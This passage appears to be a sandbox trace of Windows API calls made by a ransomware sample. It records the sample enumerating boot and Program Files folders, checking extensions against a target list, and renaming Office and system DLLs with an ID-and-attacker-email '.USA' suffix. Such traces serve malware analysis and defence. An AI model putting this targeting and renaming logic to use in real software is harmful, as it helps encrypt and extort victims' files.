lstrlenW (lpString=".zip") returned 4 [0263.966] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0263.966] lstrlenW (lpString=".rar") returned 4 [0263.966] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0263.966] lstrlenW (lpString=".bz2") returned 4 [0263.966] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0263.966] lstrlenW (lpString=".7z") returned 3 [0263.966] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0263.967] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0263.967] lstrlenW (lpString=".dbf") returned 4 [0263.967] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0263.967] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0263.967] lstrlenW (lpString=".1cd") returned 4 [0263.967] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0263.967] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0263.967] lstrlenW (lpString=".jpg") returned 4 [0263.967] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0263.967] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0263.967] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0263.967] lstrlenW (lpString=".doc") returned 4 [0263.967] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0263.967] lstrlenW (lpString=".docx") returned 5 [0263.967] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0263.967] lstrlenW (lpString=".pdf") returned 4 [0263.967] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0263.967] lstrlenW (lpString=".xls") returned 4 [0263.967] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0263.967] lstrlenW (lpString=".xlsx") returned 5 [0263.967] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0263.967] lstrlenW (lpString=".ppt") returned 4 [0263.967] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0263.967] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0263.967] lstrlenW (lpString=".zip") returned 4 [0263.967] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0263.967] lstrlenW (lpString=".rar") returned 4 [0263.967] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0263.967] lstrlenW (lpString=".bz2") returned 4 [0263.967] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0263.967] lstrlenW (lpString=".7z") returned 3 [0263.968] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0263.968] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0263.968] lstrlenW (lpString=".dbf") returned 4 [0263.968] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0263.968] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0263.968] lstrlenW (lpString=".1cd") returned 4 [0263.968] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0263.968] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0263.968] lstrlenW (lpString=".jpg") returned 4 [0263.968] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0263.968] lstrcmpiW (lpString1=".mui", lpString2=".USA") returned -1 [0263.968] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0263.968] CreateFileW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0263.968] GetFileSizeEx (in: hFile=0x2c0, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=87616) returned 1 [0263.968] CloseHandle (hObject=0x2c0) returned 1 [0263.968] GetFileAttributesW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui")) returned 0x20 [0263.968] GetFileAttributesW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0263.968] CreateFileW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0263.968] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0263.968] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0263.968] lstrlenW (lpString=".doc") returned 4 [0263.968] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0263.969] lstrlenW (lpString=".docx") returned 5 [0263.969] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0263.969] lstrlenW (lpString=".pdf") returned 4 [0263.969] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0263.969] lstrlenW (lpString=".xls") returned 4 [0263.969] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0263.969] lstrlenW (lpString=".xlsx") returned 5 [0263.969] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0263.969] lstrlenW (lpString=".ppt") returned 4 [0263.969] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0263.969] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0263.969] lstrlenW (lpString=".zip") returned 4 [0263.969] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0263.969] lstrlenW (lpString=".rar") returned 4 [0263.969] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0263.969] lstrlenW (lpString=".bz2") returned 4 [0263.969] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0263.969] lstrlenW (lpString=".7z") returned 3 [0263.969] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0263.969] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0263.969] lstrlenW (lpString=".dbf") returned 4 [0263.969] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0263.969] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0263.969] lstrlenW (lpString=".1cd") returned 4 [0263.969] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0263.969] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0263.969] lstrlenW (lpString=".jpg") returned 4 [0263.969] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0263.969] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0263.969] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0263.969] lstrlenW (lpString=".doc") returned 4 [0263.970] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0263.970] lstrlenW (lpString=".docx") returned 5 [0263.970] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0263.970] lstrlenW (lpString=".pdf") returned 4 [0263.970] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0263.970] lstrlenW (lpString=".xls") returned 4 [0263.970] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0263.970] lstrlenW (lpString=".xlsx") returned 5 [0263.970] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0263.970] lstrlenW (lpString=".ppt") returned 4 [0263.970] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0263.970] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0263.970] lstrlenW (lpString=".zip") returned 4 [0263.970] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0263.970] lstrlenW (lpString=".rar") returned 4 [0263.970] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0263.970] lstrlenW (lpString=".bz2") returned 4 [0263.970] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0263.970] lstrlenW (lpString=".7z") returned 3 [0263.970] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0263.970] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0263.970] lstrlenW (lpString=".dbf") returned 4 [0263.970] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0263.970] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0263.970] lstrlenW (lpString=".1cd") returned 4 [0263.970] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0263.970] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0263.970] lstrlenW (lpString=".jpg") returned 4 [0263.970] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0263.971] lstrcmpiW (lpString1=".mui", lpString2=".USA") returned -1 [0263.971] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0263.971] CreateFileW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0263.971] GetFileSizeEx (in: hFile=0x2c0, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=91712) returned 1 [0263.971] CloseHandle (hObject=0x2c0) returned 1 [0263.971] GetFileAttributesW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui")) returned 0x20 [0263.971] GetFileAttributesW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0263.971] CreateFileW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0263.971] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0263.971] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0263.971] lstrlenW (lpString=".doc") returned 4 [0263.971] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0263.971] lstrlenW (lpString=".docx") returned 5 [0263.971] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0263.971] lstrlenW (lpString=".pdf") returned 4 [0263.971] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0263.971] lstrlenW (lpString=".xls") returned 4 [0263.971] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0263.971] lstrlenW (lpString=".xlsx") returned 5 [0263.971] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0263.971] lstrlenW (lpString=".ppt") returned 4 [0263.971] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0263.971] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0263.971] lstrlenW (lpString=".zip") returned 4 [0263.971] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0263.972] lstrlenW (lpString=".rar") returned 4 [0263.972] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0263.972] lstrlenW (lpString=".bz2") returned 4 [0263.972] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0263.972] lstrlenW (lpString=".7z") returned 3 [0263.972] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0263.972] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0263.972] lstrlenW (lpString=".dbf") returned 4 [0263.972] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0263.972] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0263.972] lstrlenW (lpString=".1cd") returned 4 [0263.972] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0263.972] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0263.972] lstrlenW (lpString=".jpg") returned 4 [0263.972] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0263.972] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0263.972] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0263.972] lstrlenW (lpString=".doc") returned 4 [0263.972] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0263.972] lstrlenW (lpString=".docx") returned 5 [0263.972] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0263.972] lstrlenW (lpString=".pdf") returned 4 [0263.972] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0263.972] lstrlenW (lpString=".xls") returned 4 [0263.972] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0263.972] lstrlenW (lpString=".xlsx") returned 5 [0263.972] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0263.972] lstrlenW (lpString=".ppt") returned 4 [0263.972] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0263.972] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0263.972] lstrlenW (lpString=".zip") returned 4 [0263.973] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0263.973] lstrlenW (lpString=".rar") returned 4 [0263.973] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0263.973] lstrlenW (lpString=".bz2") returned 4 [0263.973] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0263.973] lstrlenW (lpString=".7z") returned 3 [0263.973] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0263.973] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0263.973] lstrlenW (lpString=".dbf") returned 4 [0263.973] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0263.973] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0263.973] lstrlenW (lpString=".1cd") returned 4 [0263.973] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0263.973] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0263.973] lstrlenW (lpString=".jpg") returned 4 [0263.973] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0263.973] lstrcmpiW (lpString1=".mui", lpString2=".USA") returned -1 [0263.973] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0263.973] CreateFileW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0263.973] GetFileSizeEx (in: hFile=0x2c0, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=94800) returned 1 [0263.973] CloseHandle (hObject=0x2c0) returned 1 [0263.973] GetFileAttributesW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui")) returned 0x20 [0263.974] GetFileAttributesW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0263.974] CreateFileW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0263.974] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0263.974] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0263.974] lstrlenW (lpString=".doc") returned 4 [0263.974] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0263.974] lstrlenW (lpString=".docx") returned 5 [0263.974] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0263.974] lstrlenW (lpString=".pdf") returned 4 [0263.974] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0263.974] lstrlenW (lpString=".xls") returned 4 [0263.974] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0263.974] lstrlenW (lpString=".xlsx") returned 5 [0263.974] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0263.974] lstrlenW (lpString=".ppt") returned 4 [0263.974] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0263.974] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0263.974] lstrlenW (lpString=".zip") returned 4 [0263.974] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0263.974] lstrlenW (lpString=".rar") returned 4 [0263.974] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0263.974] lstrlenW (lpString=".bz2") returned 4 [0263.974] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0263.974] lstrlenW (lpString=".7z") returned 3 [0263.974] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0263.976] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\chs_boot.ttf.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\boot\\fonts\\chs_boot.ttf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0264.088] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\cht_boot.ttf.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\boot\\fonts\\cht_boot.ttf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0264.556] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\micaut.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\micaut.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\micaut.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\micaut.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0264.556] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mraut.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mraut.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mraut.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mraut.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0264.577] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\csi.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\csi.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0264.579] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\CsiSoap.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\csisoap.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\CsiSoap.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\csisoap.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0264.579] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\cultures\\office.odf"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\cultures\\office.odf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0264.586] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\IACOM2.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\iacom2.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\IACOM2.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\iacom2.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0264.587] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\mso.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSO.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\mso.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0264.590] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSORES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msores.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSORES.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msores.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0264.601] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\osetup.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\osetup.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0264.803] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPCEXT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppcext.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPCEXT.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppcext.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0264.803] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPOBJS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppobjs.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPOBJS.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppobjs.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0264.805] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPSVC.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppsvc.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPSVC.EXE.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppsvc.exe.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0265.268] lstrcmpiW (lpString1=".mui", lpString2=".USA") returned -1 [0265.268] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui" (normalized: "c:\\program files\\common files\\system\\ado\\en-us\\msader15.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0265.411] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=17408) returned 1 [0265.411] CloseHandle (hObject=0x380) returned 1 [0265.411] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui" (normalized: "c:\\program files\\common files\\system\\ado\\en-us\\msader15.dll.mui")) returned 0x20 [0265.411] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\system\\ado\\en-us\\msader15.dll.mui.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0265.411] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui" (normalized: "c:\\program files\\common files\\system\\ado\\en-us\\msader15.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0265.437] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\DVDMaker.exe" (normalized: "c:\\program files\\dvd maker\\dvdmaker.exe"), lpNewFileName="C:\\Program Files\\DVD Maker\\DVDMaker.exe.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\dvd maker\\dvdmaker.exe.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0265.443] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\OmdBase.dll" (normalized: "c:\\program files\\dvd maker\\omdbase.dll"), lpNewFileName="C:\\Program Files\\DVD Maker\\OmdBase.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\dvd maker\\omdbase.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0265.443] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\OmdProject.dll" (normalized: "c:\\program files\\dvd maker\\omdproject.dll"), lpNewFileName="C:\\Program Files\\DVD Maker\\OmdProject.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\dvd maker\\omdproject.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0265.443] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Pipeline.dll" (normalized: "c:\\program files\\dvd maker\\pipeline.dll"), lpNewFileName="C:\\Program Files\\DVD Maker\\Pipeline.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\dvd maker\\pipeline.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0265.444] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\PipeTran.dll" (normalized: "c:\\program files\\dvd maker\\pipetran.dll"), lpNewFileName="C:\\Program Files\\DVD Maker\\PipeTran.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\dvd maker\\pipetran.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0265.588] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msmdlocal.dll"), lpNewFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msmdlocal.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 